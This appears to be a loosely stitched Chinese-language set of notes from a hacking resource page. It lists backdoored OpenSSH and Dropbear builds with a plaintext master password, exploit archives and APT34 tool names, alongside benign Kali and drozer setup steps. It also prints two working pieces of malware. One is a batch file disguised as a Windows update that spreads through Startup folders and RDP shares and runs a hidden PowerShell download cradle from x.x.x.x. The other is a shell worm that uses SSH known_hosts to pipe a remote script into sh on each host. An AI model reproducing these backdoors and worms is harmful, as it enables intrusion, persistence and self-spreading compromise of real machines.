北京、上海、重庆、新疆、西藏、云南、青海、湖北
828+50000
SiteServer CMS remote download getshell demo.zip
下载的后门文件
openssh*.tar.gz 修改后的文件编译安装即可,*.docx为修改说明。
Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
- FAKE_ROOT: #define 强制伪"root"uid解析,即使目标系统无法解析用户名。
- ALT_SHELL: #define 假冒root用户使用备用shell而不是/bin/sh登陆。
- Server Master Password: 在dropbear命令行上指定-Y以指定要进行身份验证的“主”密码,当没有root用户时,对FAKE_ROOT很有用,因此没有root密码。
- Forced Home Directory: 在dropbear命令行上指定-H,以使用户使用指定的主目录登录。当没有root用户时,对FAKE_ROOT很有用,因此没有root主目录。
wget https://matt.ucc.asn.au/dropbear/releases/dropbear-2018.76.tar.bz2
tar xjf dropbear-2018.76.tar.bz2
cd dropbear-2018.76
./configure --disable-zlib
make
make install
mkdir /etc/dropbear
/usr/local/bin/dropbearkey -t dss -f /etc/dropbear/dropbear_dss_host_key
/usr/local/bin/dropbearkey -t rsa -s 4096 -f /etc/dropbear/dropbear_rsa_host_key
/usr/local/sbin/dropbear -p 6666
Pass: vJrqJeJo2n005FF*
- Glimpse(Palo Alto Networks命名为BondUpdater的基于PowerShell的木马的新版本)
- PoisonFrog(旧版BondUpdater)
- HyperShell(Palo Alto Networks称之为TwoFace的网络外壳)
- HighShell(另一个Web shell)
- Fox Panel(网络钓鱼套件)
- Webmask(DNS隧道,DNSpionage背后的主要工具)
Bat To Exe转换器添加如下代码保存windows.bat
@echo off
echo Updating Windows ...
@echo off
timeout 1 >nul 2>&1
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
copy windows.exe C:\temp >nul 2>&1
copy windows.exe \\tsclient\c\temp >nul 2>&1
del /q %TEMP%\temp_00.txt >nul 2>&1
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
copy windows.exe "%%a" >nul 2>&1
copy C:\temp\windows.exe "%%a" >nul 2>&1
copy \\tsclient\c\temp\windows.exe "%%a" >nul 2>&1
)
del /q %TEMP%\temp_00.txt >nul 2>&1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x'))"
选项:
- 工作目录:当前
- EXE格式:32位windows隐藏
- 嵌入式提取到:临时目录
转换bat保存为windows.exe
,编辑windows.bat
嵌入添加windows.exe
重新转换为最终成品windows.exe
Kali Beef Framework Start Script
存档的密码:sambacry
参考:https://bi.zone/news/vulnerability-scanner-sambacry/
存档的密码:wannacry
参考:https://bi.zone/news/vulnerability-scanner-ms17-010/
systemctl enable ssh.service //开启SSH服务开机启动
nano /etc/ssh/sshd_config
允许root登陆
#PermitRootLogin prohibit-password
PermitRootLogin yes
#PasswordAuthentication yes
PasswordAuthentication yes
1.首先把kali虚拟机的网络适配器更改为桥接模式直连物理网络。
2.查看自己主机的(是自己真实电脑的不是虚拟机)ip地址,网关,网段。
3.修改nano /etc/network/interfaces
文件,添加如下内容
auto eth0 //自动启动eth0网卡
iface eth0 inet static //静态获取IP
address x.x.x.x //固定ip地址,根据实际情况填写
netmask x.x.x.x //子网掩码,根据实际情况填写
gateway x.x.x.x //网关,根据实际情况填写
4.修改nano /etc/resolv.conf
文件添加dns
nameserver 114.114.114.114
nameserver 8.8.8.8
5.重启系统或/etc/init.d/networking restart
重启网络服务
它通过执行动态程序分析来扫描几个不同的漏洞.目前正在进行以下测试:
- 任意命令执行
- 任意文件读/写/更改/重命名/删除
- 本地文件包含(LFI)
- 任意PHP执行
- SQL注入
- 反射的跨站点脚本(XSS)
对于每个测试,将特定有效负载(伪造请求)发送到Web应用程序,并分析来自服务器的响应。根据结果(HTTP响应代码,错误,......),测试将被解释为正面(发现潜在的漏洞)或负面。所有肯定测试都出现在生成的报告中,并带有已发送的有效负载
puzlbox [-s Server(默认本地主机)] [-m扫描模式(默认CFLPSX)] [绝对Web根目录] [-n No Unhook] [应用程序路径(以逗号分隔)]
存档的密码:123
linux集群源码_2.7z
XSSHunter-Setup
安装教程文章
#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
if [ -f /root/.ssh/known_hosts ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "curl -fsSL http://x.x.x.x/z0.txt | sh";done
fi
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "curl -fsSL http://x.x.x.x/z0.txt | sh";done
fi
fi
done
1、drozer下载路径
https://labs.f-secure.com/tools/drozer/
https://github.com/FSecureLABS/drozer
2、安装依赖
https://www.python.org/ftp/python/2.7.18/python-2.7.18.amd64.msi
pip install protobuf
pip install pyOpenSSL
pip install Twisted
pip install service_identity //不报错No module named service_identity,不需要安装
3、模拟器下载
https://res06.bignox.com/full/20200814/700d88dab7714cb794b7550b8feda5b1.exe?filename=nox_setup_v6.6.1.2_full.exe
4、安装drozer-agent代理
https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
5、端口转发
"D:\Program Files\Nox\bin\nox_adb.exe" forward tcp:31415 tcp:31415 //根据实际夜神模拟器安装路径调整
6、使用drozer控制台进行连接
drozer console connect
7、运行run app.package.list中文乱码
set PYTHONIOENCODING=UTF-8